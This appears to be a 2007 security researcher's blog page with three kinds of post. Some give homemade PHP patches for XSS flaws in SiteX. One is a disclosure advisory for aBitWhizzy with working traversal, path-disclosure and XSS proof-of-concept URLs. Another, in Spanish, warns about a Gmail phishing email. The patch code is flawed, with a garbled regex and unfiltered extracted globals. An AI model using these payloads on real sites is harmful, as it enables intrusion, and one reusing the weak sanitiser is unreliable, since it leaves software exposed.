Final patch For SiteX 0.7.3 beta XSS flaws

Saturday, April 21, 2007
####################################################
Patch for SiteX 0.7.3 beta XSS flaws
vendor url: http://sitex.bjsintay.com/
original article:http://lostmon.blogspot.com/2007/04/
final-patch-for-sitex-073-beta-xss.html
####################################################

patch for all of this related vulns:


http://osvdb.org/displayvuln.php?osvdb_id=33158
http://osvdb.org/displayvuln.php?osvdb_id=33159
http://osvdb.org/displayvuln.php?osvdb_id=33160

In all Files what we edit are included this file :

'includes/functions.php'

Open this file and add a new Function arround line 12-13

#####################################################
// stop XSS function to mitigate the posible XSS flaws
//use StopXSS(param or function)

function StopXSS($text){

$text = preg_replace("/(\<script)(.*?)(script>)/si", "", "$text");
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\","`","´"), "", $text);
return $text;

}


####################################################

change this code :
####################################################
// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = $v;
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = $v;
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = $v;
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = $v;

// Prevent PHP include vulnerability, initialize important vars,
will be over-written
#####################################################
for this other:
#####################################################
// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = StopXSS($v);
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = StopXSS($v);
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = StopXSS($v);
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = StopXSS($v);

// Prevent PHP include vulnerability, initialize important vars, will be over-written
#####################################################

SiteX in full of XSS flaws , all variables are afected.


########################
OSVDB ID: 33158
########################
calendar.php
Cross-Site Scripting in variables $sxMonth and $sxYear fixed !!

########################
OSVDB ID: 33159
########################
search.php
Cross-site scripting in $search fixed !!

########################
OSVDB ID:33160
########################
redirect.php
Cross-Site scripting in $linkid fixed !!

#####################################################

it also fix this variables:

- albumid and page upon submision to adbum.php
- error upon submision to login.php
- type upon submision to search.php
- sxEntryID upon submision to journal.php
- photoid,albumid and page upon submision to photo.php
- forumid and topicid upon submision forums_topic.php

###################################################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Posible patch for sitex

Saturday, April 14, 2007
Hello !

vendor url: http://sitex.bjsintay.com/

Specific entry:http://sourceforge.net/tracker/index.php?
func=detail&aid=1700736&group_id=121558&atid=690690

osvdb id:33158,33159,33160,33161

http://archives.neohapsis.com/archives/bugtraq/2007-02/0477.html

http://www.securityfocus.com/archive/1/archive
/1/461305/100/0/threaded


http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1234

after study this vulns i found a simple posible patch.

Some others params are afected like albumid upon submit to albun.php
username box upon submision to login.php ,search box upon submision
to search.php and multiple others params.

The most of those flaws could be solve by a simple patch
for "emergency" before the vendor release a update or a patch.

Open includes/functions.php

arround line 12-13 we have this code
####################################################
// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = $v;
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = $v;
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = $v;
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = $v;

// Prevent PHP include vulnerability, initialize important vars,
will be over-written
##################################################


you can change for this other :

##################################################

// stop XSS function to mitigate the posible XSS flaws
//use StopXSS(param or function)

function StopXSS($text){

$text = preg_replace("/(\)/si", "", "$text");
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\"), "", $text);
return $text;

}

// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = StopXSS($v);
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = StopXSS($v);
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = StopXSS($v);
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = StopXSS($v);
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = StopXSS($v);

// Prevent PHP include vulnerability, initialize important vars, will
be over-written

#########################################################

and the most of xss flaws now are solved :D

This patch are explain and update here :

http://lostmon.blogspot.com/2007/04/
final-patch-for-sitex-073-beta-xss.html

Thnx for your time !!!

Thnx to OSVDB !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

aBitWhizzy traversal folder enumeration and XSS

Tuesday, March 27, 2007
################################################
aBitWhizzy traversal folder enumeration and XSS
vendor url: http://www.unverse.net/abitwhizzy/
Advisore:http://lostmon.blogspot.com/2007/03/
abitwhizzy-traversal-folder-enumeration.html
vendor notify:YES exploit include:YES
OSVDB ID:34505,34506,34507,34508
Secunia:SA24679
FrSIRT:FrSIRT/ADV-2007-1136
BID:23167
################################################

aBitWhizzy is a php script that uses whizzywig.js to create
and edit web pages through a WYSIWYG interface, right through
your browser. Now your site can be updated by people with no
knowledge of HTML, FTP or AIG (Abbreviations In General).

aBitWhizzy contains a flaw that allows a remote traversal
arbitrary folder enumeration.This flaw exists because the
application does not validate 'd' variable upon submission
to 'whizzylink.php','whizzypic.php','whizzery/whizzypic.php' and 'whizzery/whizzylink.php' scripts.This could allow a
remote users to create a specially crafted URL that would
execute '../' directory traversal characters to view folder
structure on the target system with the privileges
of the target web service.

This input validation error permits too Cross-site scripting
Style attacks and full path disclosure.

###################
VERSIONS
###################

Unknow version of aBitWhizzy

##################
SOLUTION
##################

No solutions was available at this time !!

######################
TIMELINE
######################

discovered:25-03-2007
vendor notify:25-03-2007
vendor response:---------
Private Disclosure:25-03-2007
public disclosure:27-03-2007

#######################
Examples
#######################

Path disclosure:

http://localhost/abitwhizzy/whizzylink.php?d='
http://localhost/abitwhizzy/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzylink.php?d='

Folder enumeration:


http://localhost/abitwhizzy/whizzylink.php?d=
../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzypic.php?d=
../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzery/whizzypic.php?d=
/../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzery/whizzylink.php?d=
/../../../../../../../Documents%20and%20Settings


Cross Site Scripting:

http://localhost/abitwhizzy/whizzery/whizzypic.php?d=
/../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>


http://localhost/abitwhizzy/whizzery/whizzylink.php?d=
/../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>


http://localhost/abitwhizzy/whizzypic.php?d=
../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>


http://localhost/abitwhizzy/whizzylink.php?d=
../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>


########################### €nd ###################################

Thnx to estrella Que te ailoviuu un monton ;P
Thnx to all Lostmon´s Group Team

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Correo falso de Gmail pretende engañar a sus usuarios

Tuesday, February 27, 2007
Lostmon nos reporta la divulgación de un correo fraudulento,
que pretende apoderarse de las contraseñas de los usuarios del
correo de Gmail, además de descargar un archivo malicioso.

Si bien el sitio ya ha sido cerrado, es bueno estar siempre atentos
a este tipo de engaños, ya que es muy común que con pequeñas
variantes, vuelvan a reiterarse periódicamente.

En este caso, el mensaje ha sido distribuido en forma de spam,
simulando provenir de Gmail. El mismo informa que "debido al
aumento de virus en las redes," nuestra cuenta va a ser cancelada
a menos que descarguemos y ejecutemos una herramienta que
supuestamente "nos liberará de estas alimañas".

--- Parte del texto del mensaje original ---

Gmail Informativa sulla Privacy
Pol?tica de Privacidade do Gmail

31 de janeiro de 2007

Para que continue a usar o nosso servi?o Gmail, antes de entrar
no seu e-mail ou Orkut ter? que baixa nosso arquivo de seguran?a,
devido a grande n?meros de v?rus na rede, caso desconsidere este
aviso automaticamente e-mail cancelado
em ate 30 dias ?teis pelo nosso sistema.

Según el examen de Lostmon, los enlaces y otras direcciones en el
mensaje, apuntan a dominios que nada tienen que ver con Gmail,
pero la construcción del correo y los sitios falsos, han sido
cuidadosamente elaborados para simular ser los de Google.

El origen del spam parece ser Brasil, las páginas falsas estaban
alojadas en servidores gratuitos, mientras la falsa herramienta
se descargaba desde un servidor ruso (dicho archivo ya no existe).

Este tipo de mensaje, también suele ser utilizado para la distribución
de troyanos como el Win32/Spy.Banker, malware capaz de robar
información confidencial relacionada con las cuentas bancarias de
quienes caen en el engaño.

Como siempre, se recomienda no seguir enlaces ni abrir adjuntos
de mensajes que no hayan sido solicitados, sin importar su origen.


Más información:

Nuevamente los usuarios de Gmail están en peligro
Articlulo redactado por Angela Ruiz (angela@videosoft.net.uy)
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends